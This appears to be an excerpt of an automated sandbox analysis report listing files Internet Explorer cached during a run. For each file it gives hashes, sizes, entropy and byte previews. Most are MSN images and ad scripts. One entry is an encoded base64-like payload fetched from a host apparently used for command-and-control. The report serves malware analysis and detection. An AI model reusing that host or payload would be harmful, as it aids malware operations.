SSDEEP:	192:BCsFsMb78Vcznmn+9yIJMtn2Gw4RXQej4i5:k2sMH8Viluto49QKX5
MD5:	8FC6E6BFDE3D538FBE6823F3F14145D5
SHA1:	929A20BB0E8A0EAB088D95DE5487A16B01322C97
SHA-256:	BCD088193B0E30F903D64090E13A0E2774FE0B19FB278DD83B7D64723209A734
SHA-512:	CD6E787151B406035A0DC9124575CF1B0D2686A3DACAA83EC0DB62D1747F0B37609593F99DCFD94DE908080D507878A8FD77EF9E7B90AED7F5A309D0ED33D76A
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dBgwP.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg&x=797&y=261
Preview:	......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..1....zW.h.m....Tc...y....;^..MP, a....j$h....A&....>.k...!.F6..........J9.....:4eS..?.L....{.9.............;.....SH....Zq..V...d.'.^..b......[.b5C.jL...UUnc..l.....p.Zb..&.y\v.....{S....q......[y..4....Zk..}1.I.."aG8.$..^.......I!..FE"..Wq..p;UV\|.{..#n.......C-..L..;..z..V...q..................J.E.O....F6..NER..........8...p.g..jK...d.....Z%..'.@.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BB1dBlDi[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 310x166, frames 3
Category:	downloaded
Size (bytes):	5384
Entropy (8bit):	7.86548156474248
Encrypted:	false
SSDEEP:	96:BGEEHiWOG2ZGILihR5d4YjbXD1yS7RR47EDlvHRNx8N3UbSDbwGT6V/9t:BF4OGwGIL8/4IyS7eEDtRNxubsDt
MD5:	B987D3546490D5E5FFE7BD48996EA1DF
SHA1:	3558CFA34F3FACC7BA582A2415CD7E6660899C51
SHA-256:	A476D291831D6DDFDA1195FD525D596E78C74755D60AC18D2788BBE23376BC43
SHA-512:	59DA5B96EEEBE644775434D84060DA485F31385103F028E84903014EBF4828634517BEF566FC42F547B410C2754F4369AEF2B36159ACBE06ED85E7B53275A59F
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dBlDi.img?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jpg&x=687&y=353
Preview:	......JFIF.....`.`.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........6.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(...(...(...(...(...(...(....8.Q.e.c..0......cH.;bG..em.z..jbpB....'....^v..m.G......G.k>\....B@v.}.0q..') a...d..s.....i...RC3Fx4.qM..8..T..[.....=....<...P.....8~......v>....I.WF....^/.j.Zl.e..R~h..[.D._aq.....^.~....5.....+.../...?.....ZP..d..q>0. ..A......8.T{.).Y.<f.)...D..@.;iBf..y5b;o.4.f.G.7.j.0....c+.oJr......xG..R...k.....b.(. (...(...(...(

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BB1dBovk[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	downloaded
Size (bytes):	10343
Entropy (8bit):	7.932577070653324
Encrypted:	false
SSDEEP:	192:xYtLiyOMoitbytzsU0iz3qWGj32sYlySzZ80K5DtTj4yuo:OBiyT3ytFXqX3Is/9j4s
MD5:	E481CD2B524A443F4259DD7ED830B3DA
SHA1:	B720D98FAF6DC0AB99A7B2624E985D0CEC814390
SHA-256:	E9932FB5E91B857C78E8C9175C791D7F4911D04C494DAF01F69E666CEA20C273
SHA-512:	841103491601B7ADBE2190D797840DCCC0BAB9719383AA615A461975A3EB586B5B0A0511C5C13758DF01305DACF0BE6307D9CCB127F0D8F20C4FE4A581109DBA
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dBovk.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg&x=604&y=213
Preview:	......JFIF.....H.H.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....I@-......e.o@kB...4Xw;X.T.W.....].#...`T.d.E.qTg....Q... .lRg/sj...,%9..=.OJo..)..G..\7..v..W..z;i...U[. ....3g..9T....4..WG{h.x.Y.....G..`Ue\|S......V...R3.rj{k.d...S.5z+.h..=....P.$..79.~......v...MvP...).........8#.Y..r3.k;.>i.fE.d S....G.R..1.={R.k..#..-...+~c...>V..98.D.=k~.......?..k...[i.s##....T.Re.\|.....[&......QAZk ...H5... zSW+.Nq.c-4.7..W.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BB1dBtOv[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 206x250, frames 3
Category:	downloaded
Size (bytes):	6211
Entropy (8bit):	7.875313824429684
Encrypted:	false
SSDEEP:	192:BC3e97IWRKK0nvP5xaS+i+vlOgfvxBNdq/8:k3e973KKg5xj+dLnNdq/8
MD5:	0B3ADBA24414D9684681AD97F3635B32
SHA1:	C81EEB746F79661E4F543FC6EFA87E4A53A7B957
SHA-256:	E2CE1F70DD6C6FC3D06AA646BD1B9BA6D9E7982B5C84BCF403209BEE3676AE62
SHA-512:	F837B19799AFE9AD939A0C074131B46D6A6C766FFDCB8450181AC6CC976C683437728B4A2A5413ACD6BE0E28B11170804089130A71437BD5FE3CB6D43C5D779A
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dBtOv.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......Wm.A....Q...qF)..\..S.F(.....b.S.....b.R.....b.Qq....b.S...S.F(..Rb..1@.....Qp..1O....b.S.I....F)....(f(.?.b...Q.~(.......Q.w....;.b..f(.?.b...Q.v(.0..1N....7.b..1E..qI.~(.......Q...1F)....Q.v(....Q.v(.ICqF)...3.b..1@....b.P.qF)....Q.v(..7.b..1@....b.P.qI.~(..3.b..1@....b.P.qF)..\CqI.~(..;.b..1RP.R......S.F(.....Q..n(.;.b...1N....qF)....qF)....Q.v(..7....S

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BB1kKVy[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	863
Entropy (8bit):	7.63569608010223
Encrypted:	false
SSDEEP:	24:Qr64gdmEMBzvcF9u2xN99OAnpLgTrc/PmWfmw2F3:GS2NcFscfOKLgTChfH2p
MD5:	03134525726F04B87A0E34490D73D3AD
SHA1:	61EDFDF0E3C7B2C9C2FF6BBA0C1D19D6C14C86E1
SHA-256:	A37BE23752B8EBB28F060CD4EC469CC9C937A2CE62D1DF406AECE91C9C12B24D
SHA-512:	DDD913A770CC7F3973E97D98BB68837061D784D4DEB17792D625965228F870147A084719E8E63D97D7D840920845230098648644618E5EFD6377A9021A347569
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1kKVy.img?m=6&o=true&u=true&n=true&w=30&h=30
Preview:	.PNG........IHDR.............;0......sRGB.........gAMA......a.....pHYs..........o.d....IDATHK.]H.Q...].A...]hb...JX3..j..,...Fw.n.n.\.v.].Eue....+.@...Skj.....p.....{..yP.N.N...`........y.<y.;l.t.Q.T\|T$.-!..H.)B..Dcl...9g.6.HD>Y..$...A!.c. .z...(.6..F.1K..9.....j.Z..bH.D...&B.dm..T..YD..LG.H5..G..&..%.tb......T..yD...Bb.....QFh.L.....R..=......())9.L&/j4.J<.$I..e.......k....5.0^....VP.=z0x.cqq.K..t...N....D"A333444.............qF...Q3..U.T.uE........g#..~..766.0..\|J..X.zzzhbb.....`.UR.l..$yQ.R,........8(.w.v.]...W..R.em.Z..UUU..AA.....`0hv.\.BN..c.3.e2=..>!...T....O>...zwYYY.....f#$ f..L.............l.v.....7pAT".0...w..8...e....Rs..f......4.......ews=...\|d@.Kw.:vj..v..H....R<.....6??_...X........~.X,[2.`........<.h..x.a....Tn6...;.........H.Lmm.^.. ..F.4<<.{=........N..2......-......^.r.<...?....C.......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BB6Ma4a[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	396
Entropy (8bit):	6.789155851158018
Encrypted:	false
SSDEEP:	6:6v/lhPkR/CnFPFaUSs1venewS8cJY1pXVhk5Ywr+hrYYg5Y2dFSkjhT5uMEjrTp:6v/78/kFPFnXleeH8YY9yEMpyk3Tc
MD5:	6D4A6F49A9B752ED252A81E201B7DB38
SHA1:	765E36638581717C254DB61456060B5A3103863A
SHA-256:	500064FB54947219AB4D34F963068E2DE52647CF74A03943A63DC5A51847F588
SHA-512:	34E44D7ECB99193427AA5F93EFC27ABC1D552CA58A391506ACA0B166D3831908675F764F25A698A064A8DA01E1F7F58FE7A6A40C924B99706EC9135540968F1A
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB6Ma4a.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J....!IDAT8Oc\|. ..?...\|.UA....GP.`\|. ......E...b.....&.>..x.h....c.....g.N...?5.1.8p.....>1..p...0.EA.A...0...cC/...0Ai8...._....p.....)....2...AE....Y?.......8p..d......$1l.%.8.<.6..Lf..a.........%.....-.q...8...4...."...`5..G!.\|..L....p8 ...p.......P....,..l.(..C]@L.#....P...)......8......[.7MZ.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BB7gRE[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	482
Entropy (8bit):	7.256101581196474
Encrypted:	false
SSDEEP:	12:6v/78/kFLsiHAnE3oWxYZOjNO/wpc433jHgbc:zLeO/wc433Cc
MD5:	307888C0F03ED874ED5C1D0988888311
SHA1:	D6FB271D70665455A0928A93D2ABD9D9C0F4E309
SHA-256:	D59C8ADBE1776B26EB3A85630198D841F1A1B813D02A6D458AF19E9AAD07B29F
SHA-512:	6856C3AA0849E585954C3C30B4C9C992493F4E28E41D247C061264F1D1363C9D48DB2B9FA1319EA77204F55ADBD383EFEE7CF1DA97D5CBEAC27EC3EF36DEFF8E
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7gRE.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J....wIDAT8O.RKN.0.}v\....U....-.. ......8..{$...z..@.....+.......K...%)...I......C4.../XD].Y..:.w.....B9..7..Y..(.m.3. .!..p..,.c.>.\<H.0....,w:.F..m...8c,.^........E.......S...G.%.y.b....Ab.V.-.}.=..."m.O..!...q.....]N.)..w..\..v^.^...u...k..0.....R.....c!.N...DN`)x..:.."*Brg.0avY.>.h...C.S...Fqv._.]......E.h.\|Wg..l........@.$.Z.]....i8.$).t..y.W..H..H.W.8..B...'............IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BB7hjL[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	444
Entropy (8bit):	7.25373742182796
Encrypted:	false
SSDEEP:	6:6v/lhPkR/CnFFDDRHbMgYjEr710UbCO8j+qom62fke5YCsd8sKCW5biVp:6v/78/kFFlcjEN0sCoqoX4ke5V6D+bi7
MD5:	D02BB2168E72B702ECDD93BF868B4190
SHA1:	9FB22D0AB1AAA390E0AFF5B721013E706D731BF3
SHA-256:	D2750B6BEE5D9BA31AFC66126EECB39099EF6C7E619DB72775B3E0E2C8C64A6F
SHA-512:	6A801305D1D1E8448EEB62BC7062E6ED7297000070CA626FC32F5E0A3B8C093472BE72654C3552DA2648D8A491568376F3F2AC4EA0135529C96482ECF2B2FD35
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hjL.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J....QIDAT8O....DA.....F...md5"...R%6.].@.............D.....Q...}s.0...~.7svv.......;.%..\.....]...LK$...!.u....3.M.+.U..a..~O......O.XR=.s.../....I....l.=9$...........~A.,. ..<...Yq.9.8...I.&.....V. ..M.\..V6.....O.........!y:p.9..l......"9.....9.7.N.o^[..d......]g.%..L.1...B.1k....k....v#._.w/...w...h..\....W...../..S.`.f.......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BBVuddh[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	304
Entropy (8bit):	6.758580075536471
Encrypted:	false
SSDEEP:	6:6v/lhPkR/ChmU5nXyNbWgaviGjZ/wtDi6Xxl32inTvUI8zVp:6v/78/e5nXyNb4lueg32au/
MD5:	245557014352A5F957F8BFDA87A3E966
SHA1:	9CD29E2AB07DC1FEF64B6946E1F03BCC0A73FC5C
SHA-256:	0A33B02F27EE6CD05147D81EDAD86A3184CCAF1979CB73AD67B2434C2A4A6379
SHA-512:	686345FD8667C09F905CA732DB98D07E1D72E7ECD9FD26A0C40FEE8E8985F8378E7B2CB8AE99C071043BCB661483DBFB905D46CE40C6BE70EEF78A2BCDE94605
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........+......IDAT8O...P...3.....v..`0.}...'..."XD.`.`.5.3. ....)...a.-.............d.g.mSC.i..%.8*].}....m.$I0M..u.. ...,9.........i....X..<.y..E..M....q... ."...,5+..]..BP.5.>R....iJ.0.7.\|?.....r.\-Ca......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BBnYSFZ[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	560
Entropy (8bit):	7.425950711006173
Encrypted:	false
SSDEEP:	12:6v/78/+m8H/Ji+Vncvt7xBkVqZ5F8FFl4hzuegQZ+26gkalFUx:6H/xVA7BkQZL8OhzueD+ikalY
MD5:	CA188779452FF7790C6D312829EEE284
SHA1:	076DF7DE6D49A434BBCB5D88B88468255A739F53
SHA-256:	D30AB7B54AA074DE5E221FE11531FD7528D9EEEAA870A3551F36CB652821292F
SHA-512:	2CA81A25769BFB642A0BFAB8F473C034BFD122C4A44E5452D79EC9DC9E483869256500E266CE26302810690374BF36E838511C38F5A36A2BF71ACF5445AA2436
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....IDAT8O.S.KbQ..zf.j...?@...........J.......z..EA3P....AH...Y..3......\|6.6}......{..n. ...b..........".h4b.z.&.p8`...:..Lc....u:......D...i$.)..pL.^..dB.T....#.f3...8.N.b1.B!.\...n..a...a.Z........J%.x<....\|..b.h4.`0.EQP.. v.q....f.9.H`8..\...j.N&...X,2...<.B.v[.(.NS6..\|>..n4...2.57........f.Q&.a-..v..z..{P.V......>k.J...ri..,.W.+.......5:.W.t...i.....g....\.t..8.w...:......0....%~...F.F.o".'rx...b..vp....b.l.Pa.W.r..aK..9&...>.5...`..'W......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\checksync[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	20808
Entropy (8bit):	5.301544177099164
Encrypted:	false
SSDEEP:	384:RkAGcVXlblcqnzleZSug2f5vzBgF3OZORQWwY4RXrqt:g86qhbz2RmF3OsRQWwY4RXrqt
MD5:	00593785BE18A01F5D591B270BE7794E
SHA1:	B2D6DFE036CAA0CCFF1DC25CDFD8C1488D086BE8
SHA-256:	5B9547D49C57F24E7FC08CB73A03E3F9EDDDC573610D2B3894B85781DD81703E
SHA-512:	210E3849EE1113DFD7F949AC3FDFA3E77E3651716D06496DBC288EF67C7540F326668DAC8D6EE5CBE86147E830BB24533899C5E0276C9F8EEA008DE9211F7435
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":75,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\checksync[2].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	20808
Entropy (8bit):	5.301544177099164
Encrypted:	false
SSDEEP:	384:RkAGcVXlblcqnzleZSug2f5vzBgF3OZORQWwY4RXrqt:g86qhbz2RmF3OsRQWwY4RXrqt
MD5:	00593785BE18A01F5D591B270BE7794E
SHA1:	B2D6DFE036CAA0CCFF1DC25CDFD8C1488D086BE8
SHA-256:	5B9547D49C57F24E7FC08CB73A03E3F9EDDDC573610D2B3894B85781DD81703E
SHA-512:	210E3849EE1113DFD7F949AC3FDFA3E77E3651716D06496DBC288EF67C7540F326668DAC8D6EE5CBE86147E830BB24533899C5E0276C9F8EEA008DE9211F7435
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":75,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\d[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	268376
Entropy (8bit):	5.999818967395032
Encrypted:	false
SSDEEP:	6144:Tsk3ZyAFTpfZHXe7iCtwBMYcD5hEIAB1nlolNefDVWx8Ziz:Tjy6xZX98wBrcD5hEIAHaj0Ziz
MD5:	D4940FE4806513B4EB9D6786E6A9587A
SHA1:	97E0D66AC77D0FAED4C2A18D0B0D445AAB1FD29E
SHA-256:	DA2DDABA0A47F8F0928B3469E8A4A017612761A235F0DC6E65A87345A5DAD1F2
SHA-512:	E7DE3440AA94578F90CACC9AD2D634A5747064D182FB0B9B5E80312489089F4694485DFFE41791DB15BCDA6F6789B84E8DF17B99524CF539AD4AF1596276A297
Malicious:	false
IE Cache URL:	http://api10.laptok.at/api1/lgORGW5qFn_2FL/FlQCK9WAHI3Hiwfkv_2Bd/YD_2BI2Xw2AGWng8/expfsroDYWZ8_2B/ZGfgnzwsY_2FSQ_2F3/a2GGZduez/SqOtvGRODR9NxK4_2F3R/2gP8hWIKAYYweque45c/mmo1QCYZVFeP5qFtRQW3rp/ESP8Dg0JYvi4a/zzwdg1Ba/kVPhJOlEUkXV9nZ6TtxGPu4/gqcL2pxbRo/OD4R3VuLXH9TB9ksT/J7YsghyQco_2/BonnsCX3QSq/e_2FlgvYSOP02Q/dsGMQxaYUUX012u0t5_2F/50UM82sSS5a5iW39/tnrjay9bJzCbz3PtHnh/d
Preview:	ORntLlYmQNQojwzpe785MZSDSuEQGu2B0ele9rAt6KSWwhNOzZ4E6Xvx4DcDDaM/TTcusBDq2c0Gtitd651ZSTy9eKnd0JzAaJ0pIVyVE0kGsqlHZJqqWFC00Jl/7WejoECLLPPMGfpn9tsLjqM9k3CLLpRm5CTtY+KszGxriTexfD0dqRs+mEAstNOUKiziWFsa649fBBPUoYlEnbK68IzjNP/zDJ0qFyXczK3dCwt2YoJo2pX55qtAWHax0/AB3yXCj3MOY+jvJ3Uw58EOJ5bSGc57T2XF2AJjM9ZRtPurK2aUZm0nuMGelMa+Q3wVCNrBPuuakR4Gsr5EspKQ0DnPB8K0g6RGuIxz33HVJd5wXMt3wHbm4Hn3D4NnmzRh9leX1iTE17Buxpk7oSnUAGbzhkezkyRwvECOplTGoBJoF+gDUIHX8Jr3auqnOIAkTZ+KBJYtYu4taTSZLNg1JHIWgwcPwHKp87QocbzTx06iyvBLBTOi3u4Djp7v0fG000B55we8vpXXXeOSvqSsB0K3/jivtLlzS5WR8T3rLrVp5Zt3yKPr4HbMJPPq2dOfe8A+8F7jy7NFOw/w9m7LaUkLbrAGJAH/lpwNsljQExoiYdZu8HmERfmxxOBHXM1Dkk5A1afJegIIx9vwcghK+x/TbSSUFGwC02yIcVqIp4tyhcZqVAc97clfHcVJ7MSVZIpyhSsEeYV4ix0RyDoexmN/SFtZZwkx9VdcrUcGbu9AMjFoJjXz5Uo8AtYK02oaN2k+MFmL6hYBIFl51a/B0HiZtlnuQgmb7HUIn37C2yD3doui2v+Bzq+I9Wyj1+ikqWoQE3yTh4KAKte97fLKSyNP2IvC/ekp//e01hAs2HoEnb6pFahsERXLZ/FAborrePbjLdZfB5nCDZbKPgzXRbIPqkGkVpWrjBQdAncMYF0o7pY3PyfXvF5Ox3HAztG1cfUdLkb02DJ9CkR5UcagleIw1Spqhu7s3XAy3Kr9

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\fcmain[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	38553
Entropy (8bit):	5.061129211095044
Encrypted:	false
SSDEEP:	768:j1av44u3hPPYW94hN/EnraEYXf9wOBEZn3SQN3GFl295oGtl8J/qtlVs6:pQ44uRIWmhNcnraEYXf9wOBEZn3SQN3R
MD5:	CB0C6F3706ABA9CDC64296CA83A226EB
SHA1:	F6721E2BF38A68FE27570940C43CE84F1B5CC07C
SHA-256:	CA105D38BC030F44E3766C7C3242E86E80B38ED2185D2902C3D60AD6BEDFD2B4
SHA-512:	0A64188AB48A9A88C750E56C13317756EE5E70AF1E0D9686139459CB0CC2CEFE7ABF79AE03EC9325D2C6DCC71E44073AAA1321CF4EBDFC29990E91AB8C2CF0D5
Malicious:	false
IE Cache URL:	https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3D%3D&crid=858412214&size=306x271&cc=CH&https=1&vif=2&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&nse=5&vi=1613090824812383630&ugd=4&rtbs=1&nb=1&cb=window._mNDetails.initAd
Preview:	;window._mNDetails.initAd({"vi":"1613090824812383630","s":{"_mNL2":{"size":"306x271","viComp":"1613090824812383630","hideAdUnitABP":true,"abpl":"3","custHt":"","setL3100":"1"},"lhp":{"l2wsip":"2887305290","l2ac":"","sethcsd":"set!N7\|983"},"_mNe":{"pid":"8PO8WH2OT","requrl":"https://www.msn.com/de-ch/?ocid=iehp#mnetcrid=858412214#"},"_md":[],"ac":{"content":"<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.01 Transitional\/\/EN\" \"http:\/\/www.w3.org\/TR\/html4\/loose.dtd\">\r\n<html xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\r\n<head><meta http-equiv=\"x-dns-prefetch-control\" content=\"on\"><style type=\"text\/css\">body{background-color: transparent;}<\/style><meta name=\"tids\" content=\"a='800072941' b='803767816' c='msn.com' d='entity type'\" \/><script type=\"text\/javascript\">try{window.locHash = (parent._mNDetails && parent._mNDetails.getLocHash && parent._mNDetails.getLocHash(\"858412214\",\"1613090824812383630\")) \|\| (parent._mNDetails[\"locHash\"] && paren

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\http___cdn.taboola.com_libtrc_static_thumbnails_1922f0dc8699bf8edcf7c727cbc43d75[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	33654
Entropy (8bit):	7.93677204324885
Encrypted:	false
SSDEEP:	768:BYyF/HAL/a8mvWHUHD1aJ1izFi/1kp99ssSdA:BxE/We0HD148j
MD5:	C63DABAF54A1E9D41C87A8D67E56D68A
SHA1:	C07BF0B5ED6DE22AC372782599D8A7ED74F82348
SHA-256:	2C676E5170D304519ED2F955C9F14B8D5D2535642A5A447A54FCCFE91C8AF80F
SHA-512:	47FD83E49A1D35C83D02B649D539B4B0D36A72E3B0586FBCDA9460AA1FB533A719983998C75B9EDF2E261563E47CA702A793801037EF207DDA5F3982CBA45107
Malicious:	false
